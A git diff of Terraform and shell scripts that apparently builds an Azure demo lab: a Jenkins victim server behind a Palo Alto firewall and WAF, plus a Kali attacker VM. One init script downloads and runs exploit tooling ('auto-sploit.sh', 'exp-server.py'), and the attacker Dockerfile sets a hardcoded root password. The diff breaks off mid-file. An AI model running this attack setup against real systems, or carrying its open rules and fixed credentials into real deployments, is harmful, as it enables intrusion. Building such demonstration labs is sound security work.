"internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} +resource "azurerm_subnet_route_table_association" "attacker" { + subnet_id = "${azurerm_subnet.attacker.id}" + route_table_id = "${azurerm_route_table.attacker.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf new file mode 100644 index 00000000..c6c9cef0 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf @@ -0,0 +1,46 @@ +data "template_file" "attacker" { + + template = "${file("${path.root}${var.Attack_Initscript_Path}")}" +} +data "template_cloudinit_config" "attacker" { + gzip = true + base64_encode = true + + part { + content = "${data.template_file.attacker.rendered}" + } +} + +resource "azurerm_virtual_machine" "attacker" { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + vm_size = "Standard_A3" + + storage_image_reference { + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + version = "latest" + } + + storage_os_disk { + name = "attacker-disk" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + os_profile { + computer_name = "attacker" + admin_username = "${var.Admin_Username}" + admin_password = "${var.Admin_Password}" + custom_data = "${data.template_cloudinit_config.attacker.rendered}" + } + + network_interface_ids = ["${azurerm_network_interface.attacker.id}"] + + os_profile_linux_config { + disable_password_authentication = false + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf b/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf new file mode 100644 index 00000000..14f0338f --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf @@ -0,0 +1,155 @@ +#### CREATE THE LOAD BALANCERS #### + +#### AppGW1 #### + +resource "azurerm_application_gateway" "appgw1" { + name = "appgw1" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + sku { + name = "WAF_Medium" + tier = "WAF" + capacity = 2 + } + waf_configuration { + enabled = "true" + firewall_mode = "Prevention" + rule_set_type = "OWASP" + rule_set_version = "3.0" + } + gateway_ip_configuration { + name = "loadbalancers" + subnet_id = "${azurerm_subnet.loadbalancers.id}" + } + frontend_port { + name = "http" + port = 80 + } + frontend_ip_configuration { + name = "lbpublicipaddress1" + public_ip_address_id = "${azurerm_public_ip.appgw1.id}" + } + backend_address_pool { + name = "webservers" + ip_addresses = ["${var.Web_IP}"] + } + http_listener { + name = "http" + frontend_ip_configuration_name = "lbpublicipaddress1" + frontend_port_name = "http" + protocol = "Http" + } + backend_http_settings { + name = "http" + cookie_based_affinity = "Disabled" + port = 8080 + protocol = "Http" + request_timeout = 1 + } + request_routing_rule { + name = "http" + rule_type = "Basic" + http_listener_name = "http" + backend_address_pool_name = "webservers" + backend_http_settings_name = "http" + } + depends_on = ["data.azurerm_resource_group.resourcegroup"] +} + +#### AppGW2 #### + +resource "azurerm_application_gateway" "appgw2" { + name = "appgw2" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + sku { + 
name = "WAF_Medium" + tier = "WAF" + capacity = 2 + } + waf_configuration { + enabled = "true" + firewall_mode = "Prevention" + rule_set_type = "OWASP" + rule_set_version = "3.0" + } + gateway_ip_configuration { + name = "loadbalancers" + subnet_id = "${azurerm_subnet.loadbalancers.id}" + } + frontend_port { + name = "http" + port = 80 + } + frontend_ip_configuration { + name = "lbpublicipaddress2" + public_ip_address_id = "${azurerm_public_ip.appgw2.id}" + } + backend_address_pool { + name = "firewalls" + ip_addresses = ["${var.FW_Untrust_IP}"] + } + http_listener { + name = "http" + frontend_ip_configuration_name = "lbpublicipaddress2" + frontend_port_name = "http" + protocol = "Http" + } + backend_http_settings { + name = "http" + cookie_based_affinity = "Disabled" + port = 80 + protocol = "Http" + request_timeout = 1 + } + request_routing_rule { + name = "http" + rule_type = "Basic" + http_listener_name = "http" + backend_address_pool_name = "firewalls" + backend_http_settings_name = "http" + } + depends_on = ["data.azurerm_resource_group.resourcegroup"] +} + +#### INTERNAL APP FACING LOAD BALANCER #### + +resource "azurerm_lb" "weblb" { + name = "weblb" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + frontend_ip_configuration { + name = "weblbip" + subnet_id = "${azurerm_subnet.webservers.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.WebLB_IP}" + } +} +resource "azurerm_lb_backend_address_pool" "webservers" { + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + loadbalancer_id = "${azurerm_lb.weblb.id}" + name = "webservers" +} +resource "azurerm_network_interface_backend_address_pool_association" "webservers" { + network_interface_id = "${azurerm_network_interface.web1.id}" + ip_configuration_name = "web1eth0" + backend_address_pool_id = "${azurerm_lb_backend_address_pool.webservers.id}" +} +resource "azurerm_lb_probe" "webservers" { + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + loadbalancer_id = "${azurerm_lb.weblb.id}" + name = "http-running-probe" + port = 8080 +} + +resource "azurerm_lb_rule" "webservers" { + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + loadbalancer_id = "${azurerm_lb.weblb.id}" + name = "WebRule" + protocol = "Tcp" + frontend_port = 8080 + backend_port = 8080 + frontend_ip_configuration_name = "weblbip" + backend_address_pool_id = "${azurerm_lb_backend_address_pool.webservers.id}" + probe_id = "${azurerm_lb_probe.webservers.id}" +} diff --git a/azure/Jenkins_proj-working/WebInDeploy/nsg.tf b/azure/Jenkins_proj-working/WebInDeploy/nsg.tf new file mode 100644 index 00000000..fd8452a8 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/nsg.tf @@ -0,0 +1,84 @@ +resource "azurerm_network_security_group" "PAN_FW_NSG" { + name = "DefaultNSG" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + location = "${data.azurerm_resource_group.resourcegroup.location}" + + security_rule { + name = "Allow-22" + priority = 100 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "22" + source_address_prefix = "*" + destination_address_prefix = "${var.FW_Mgmt_IP}" + } + security_rule { + name = "Allow-443" + priority = 101 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "443" + source_address_prefix = "*" + 
destination_address_prefix = "${var.FW_Mgmt_IP}" + } + + security_rule { + name = "Allow-80-LB" + priority = 102 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "80" + source_address_prefix = "*" + destination_address_prefix = "*" + } + + security_rule { + name = "Allow-Intra-80" + priority = 103 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "80" + source_address_prefix = "${var.Victim_CIDR}" + destination_address_prefix = "*" + } + + security_rule { + name = "Allow-Intra-8080" + priority = 104 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "8080" + source_address_prefix = "${var.Victim_CIDR}" + destination_address_prefix = "*" + } +} +resource "azurerm_subnet_network_security_group_association" "management" { + subnet_id = "${azurerm_subnet.management.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "untrust" { + subnet_id = "${azurerm_subnet.untrust.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "trust" { + subnet_id = "${azurerm_subnet.trust.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "loadbalancers" { + subnet_id = "${azurerm_subnet.loadbalancers.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "webservers" { + subnet_id = "${azurerm_subnet.webservers.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/outputs.bak b/azure/Jenkins_proj-working/WebInDeploy/outputs.bak new file mode 100644 index 00000000..3e50e79d --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/outputs.bak @@ -0,0 +1,19 @@ +output "MGT-IP-FW-1" { + value = "${azurerm_public_ip.fwmanagement.ip_address}" +} + +output "NLB-DNS" { + value = "${aws_lb.int-nlb.dns_name}" +} + +output "ALB-DNS" { + value = "${aws_lb.panos-alb.dns_name}" +} + +output "NATIVE-DNS" { + value = "${aws_lb.native-alb.dns_name}" +} + +output "ATTACKER_IP" { + value = "${azurerm_public_ip.attacker.ip_address}" +} diff --git a/azure/Jenkins_proj-working/WebInDeploy/outputs.tf b/azure/Jenkins_proj-working/WebInDeploy/outputs.tf new file mode 100644 index 00000000..81a006ad --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/outputs.tf @@ -0,0 +1,27 @@ +output "MGT-IP-FW-1" { + value = "${azurerm_public_ip.fwmanagement.ip_address}" +} + +output "NLB-DNS" { + value = "${var.WebLB_IP}" +} + +output "ALB-DNS" { + value = "${azurerm_public_ip.appgw2.fqdn}" +} + +output "NATIVE-DNS" { + value = "${azurerm_public_ip.appgw1.fqdn}" +} + +output "ATTACKER_IP" { + value = "${azurerm_public_ip.attacker.ip_address}" +} + +output "RG_Name" { + value = "${data.azurerm_resource_group.resourcegroup.name}" +} + +output "Attacker_RG_Name" { + value = "${azurerm_resource_group.attackgroup.name}" +} diff --git a/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf b/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf new file mode 100644 index 00000000..2db98644 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf @@ -0,0 
+1,26 @@ +#### CREATE PUBLIC IP ADDRESSES #### +resource "random_id" "public_ip" { + byte_length = 2 +} +resource "azurerm_public_ip" fwmanagement { + name = "fwmanagement" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + allocation_method = "Static" +} + +resource "azurerm_public_ip" "appgw1" { + name = "appgw1" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + domain_name_label = "sans-ngfw-${lower(random_id.public_ip.hex)}" + allocation_method = "Dynamic" +} + +resource "azurerm_public_ip" "appgw2" { + name = "appgw2" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + domain_name_label = "with-ngfw-${lower(random_id.public_ip.hex)}" + allocation_method = "Dynamic" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf new file mode 100644 index 00000000..efc3be8f --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf @@ -0,0 +1,54 @@ +//# ********** RESOURCE GROUP ********** +// +//# Create a resource group +resource "azurerm_resource_group" "resourcegroup" { + name = "${var.RG_Name}" + location = "${var.Azure_Region}" +} + +//# ********** VNET ********** +// +//# Create a virtual network in the resource group +//resource "azurerm_virtual_network" "vnet" { +// name = "vnet-fw" +// address_space = ["${var.VNetCIDR}"] +// location = "${azurerm_resource_group.resourcegroup.location}" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +//} +// +//#### CREATE THE SUBNETS #### +// +//resource "azurerm_subnet" "management" { +// name = "management" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_MGMT}" +//} +// +//resource "azurerm_subnet" "untrust" { +// name = "untrust" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_UntrustBlock}" +//} +// +//resource "azurerm_subnet" "trust" { +// name = "trust" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_TrustBlock}" +//} +// +//resource "azurerm_subnet" "loadbalancers" { +// name = "loadbalancers" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_AppGWBlock}" +//} +// +//resource "azurerm_subnet" "webservers" { +// name = "webservers" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_WebBlock}" +//} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf b/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf new file mode 100644 index 00000000..7b286b57 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf @@ -0,0 +1,48 @@ +#### CREATE THE ROUTE TABLES #### + +resource "azurerm_route_table" "management" { + name = "management" + location = 
"${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} +resource "azurerm_route_table" "untrust" { + name = "untrust" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} + +resource "azurerm_route_table" "webservers" { + name = "webservers" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} + +resource "azurerm_subnet_route_table_association" "management" { + subnet_id = "${azurerm_subnet.management.id}" + route_table_id = "${azurerm_route_table.management.id}" +} + +resource "azurerm_subnet_route_table_association" "untrust" { + subnet_id = "${azurerm_subnet.untrust.id}" + route_table_id = "${azurerm_route_table.untrust.id}" +} + +resource "azurerm_subnet_route_table_association" "webservers" { + subnet_id = "${azurerm_subnet.webservers.id}" + route_table_id = "${azurerm_route_table.webservers.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh new file mode 100644 index 00000000..032feb65 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh @@ -0,0 +1,14 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh new file mode 100644 index 00000000..4cabd5ed --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh @@ -0,0 +1,13 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml +wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py +docker-compose build +docker-compose up -d diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh new file mode 100644 index 00000000..bb37c3e5 --- /dev/null +++ 
b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh new file mode 100644 index 00000000..17b352c5 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh @@ -0,0 +1,11 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh +docker-compose build +docker-compose up -d diff --git a/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars b/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars new file mode 100644 index 00000000..f56aa41c --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars @@ -0,0 +1,47 @@ +Attack_RG_Name = "" + +Azure_Region = "" + +Admin_Username = "" + +Admin_Password = "" + +Bootstrap_Storage_Account = "" + +Storage_Account_Access_Key = "" + +Storage_Account_Fileshare = "" + +Storage_Account_Fileshare_Directory = "None" + +Web_Initscript_Path = "/scripts/initialize_webserver.sh" + +Attack_Initscript_Path = "/scripts/initialize_attacker.sh" + +Victim_CIDR = "10.0.0.0/16" + +Attack_CIDR = "10.1.0.0/16" + +Mgmt_Subnet_CIDR = "10.0.0.0/24" + +Untrust_Subnet_CIDR = "10.0.1.0/24" + +Trust_Subnet_CIDR = "10.0.2.0/24" + +AppGW_Subnet_CIDR = "10.0.3.0/24" + +Web_Subnet_CIDR = "10.0.4.0/24" + +Attack_Subnet_CIDR = "10.1.1.0/24" + +FW_Mgmt_IP = "10.0.0.10" + +FW_Untrust_IP = "10.0.1.10" + +FW_Trust_IP = "10.0.2.10" + +WebLB_IP = "10.0.4.10" + +Web_IP = "10.0.4.50" + +Attack_IP = "10.1.1.50" diff --git a/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf new file mode 100644 index 00000000..12c64ba4 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf @@ -0,0 +1,53 @@ +# Configure the Microsoft Azure Provider +provider "azurerm" {} + +data "azurerm_resource_group" "resourcegroup" { + name = "${var.RG_Name}" +} + +# ********** VNET ********** + +# Create a virtual network in the resource group +resource "azurerm_virtual_network" "vnet" { + name = "vnet-fw" + address_space = ["${var.Victim_CIDR}"] + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" +} + +#### CREATE THE SUBNETS #### + +resource "azurerm_subnet" "management" 
{ + name = "management" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Mgmt_Subnet_CIDR}" +} + +resource "azurerm_subnet" "untrust" { + name = "untrust" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Untrust_Subnet_CIDR}" +} + +resource "azurerm_subnet" "trust" { + name = "trust" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Trust_Subnet_CIDR}" +} + +resource "azurerm_subnet" "loadbalancers" { + name = "loadbalancers" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.AppGW_Subnet_CIDR}" +} + +resource "azurerm_subnet" "webservers" { + name = "webservers" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Web_Subnet_CIDR}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/webservers.tf b/azure/Jenkins_proj-working/WebInDeploy/webservers.tf new file mode 100644 index 00000000..5cfab277 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/webservers.tf @@ -0,0 +1,46 @@ +data "template_file" "cloudconfig" { + + template = "${file("${path.root}${var.Web_Initscript_Path}")}" +} +data "template_cloudinit_config" "config" { + gzip = true + base64_encode = true + + part { + content = "${data.template_file.cloudconfig.rendered}" + } +} + +resource "azurerm_virtual_machine" "webserver" { + name = "webserver" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + vm_size = "Standard_A3" + + storage_image_reference { + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + version = "latest" + } + + storage_os_disk { + name = "web-disk" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + os_profile { + computer_name = "webserver" + admin_username = "${var.Admin_Username}" + admin_password = "${var.Admin_Password}" + custom_data = "${data.template_cloudinit_config.config.rendered}" + } + + network_interface_ids = ["${azurerm_network_interface.web1.id}"] + + os_profile_linux_config { + disable_password_authentication = false + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf b/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf new file mode 100644 index 00000000..844625d6 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf @@ -0,0 +1,10 @@ + +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "Web_IP" {} +variable "LB_IP" {} +variable "Admin_Username" {} +variable "Admin_Password" {} +variable "FW_Default_GW" {} +variable "FW_Internal_GW" {} +variable "Web_Subnet_CIDR" {} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf b/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf new file mode 100644 index 00000000..da110808 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf @@ -0,0 +1,209 @@ +provider "panos" { + hostname = "${var.FW_Mgmt_IP}" + username = "${var.Admin_Username}" 
+ password = "${var.Admin_Password}" +} + +resource "panos_management_profile" "imp_allow_ping" { + name = "Allow ping" + ping = true +} + +resource "panos_ethernet_interface" "eth1_1" { + name = "ethernet1/1" + vsys = "vsys1" + mode = "layer3" + comment = "External interface" + enable_dhcp = true + + management_profile = "${panos_management_profile.imp_allow_ping.name}" +} + +resource "panos_ethernet_interface" "eth1_2" { + name = "ethernet1/2" + vsys = "vsys1" + mode = "layer3" + comment = "Web interface" + enable_dhcp = true +} + +resource "panos_zone" "zone_untrust" { + name = "UNTRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_1.name}"] +} + +resource "panos_zone" "zone_trust" { + name = "TRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_2.name}"] +} + +resource "panos_service_object" "so_22" { + name = "service-tcp-22" + protocol = "tcp" + destination_port = "22" +} + +resource "panos_service_object" "so_221" { + name = "service-tcp-221" + protocol = "tcp" + destination_port = "221" +} + +resource "panos_service_object" "so_222" { + name = "service-tcp-222" + protocol = "tcp" + destination_port = "222" +} + +resource "panos_service_object" "so_81" { + name = "service-http-81" + protocol = "tcp" + destination_port = "81" +} + +resource "panos_address_object" "intLB" { + name = "Azure-Int-LB" + value = "${var.LB_IP}" + description = "Azure Int LB Address" +} + +resource "panos_security_policies" "security_policies" { + rule { + name = "SSH inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "SSH 221-222 inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Allow all ping" + source_zones = ["any"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["any"] + destination_addresses = ["any"] + applications = ["ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Permit Health Checks" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["elb-healthchecker"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Web browsing" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["web-browsing", "jenkins", "windows-azure-base"] + services = ["service-http", "${panos_service_object.so_81.name}"] + categories = ["any"] + group = "Inbound" + action = "allow" + } + + rule { + name = "Allow all outbound" + source_zones = 
["${panos_zone.zone_trust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["any"] + services = ["application-default"] + categories = ["any"] + group = "Outbound" + action = "allow" + } +} + +resource "panos_nat_policy" "nat1" { + name = "Web1 SSH" + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + service = "${panos_service_object.so_221.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + sat_type = "dynamic-ip-and-port" + sat_address_type = "interface-address" + sat_interface = "${panos_ethernet_interface.eth1_2.name}" + dat_type = "static" + dat_address = "${var.Web_IP}" + dat_port = "22" +} + +resource "panos_nat_policy" "nat3" { + name = "Webserver NAT" + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + service = "service-http" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + sat_type = "dynamic-ip-and-port" + sat_address_type = "interface-address" + sat_interface = "${panos_ethernet_interface.eth1_2.name}" + dat_type = "dynamic" + dat_address = "Azure-Int-LB" + dat_port = "8080" +} + +resource "panos_virtual_router" "vr1" { + name = "default" + interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"] +} + +resource "panos_static_route_ipv4" "default" { + name = "default" + virtual_router = "${panos_virtual_router.vr1.name}" + interface = "${panos_ethernet_interface.eth1_1.name}" + destination = "0.0.0.0/0" + next_hop = "${var.FW_Default_GW}" +} + +resource "panos_static_route_ipv4" "internal" { + name = "internal" + virtual_router = "${panos_virtual_router.vr1.name}" + interface = "${panos_ethernet_interface.eth1_2.name}" + destination = "${var.Web_Subnet_CIDR}" + next_hop = "${var.FW_Internal_GW}" +} diff --git a/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars b/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars new file mode 100644 index 00000000..e35d4a52 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars @@ -0,0 +1,15 @@ +Admin_Username = "" + +Admin_Password = "" + +FW_Untrust_IP = "10.0.1.10" + +LB_IP = "10.0.4.10" + +Web_IP = "10.0.4.50" + +FW_Default_GW = "10.0.1.1" + +Web_Subnet_CIDR = "10.0.4.0/24" + +FW_Internal_GW = "10.0.2.1" \ No newline at end of file diff --git a/azure/Jenkins_proj-working/attacker/Dockerfile b/azure/Jenkins_proj-working/attacker/Dockerfile new file mode 100644 index 00000000..e6123ab4 --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/Dockerfile @@ -0,0 +1,42 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo python3 python3-pip && rm -rf /var/lib/apt/lists/* + +RUN echo 'root:paloalto' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +RUN set -ex \ + && wget 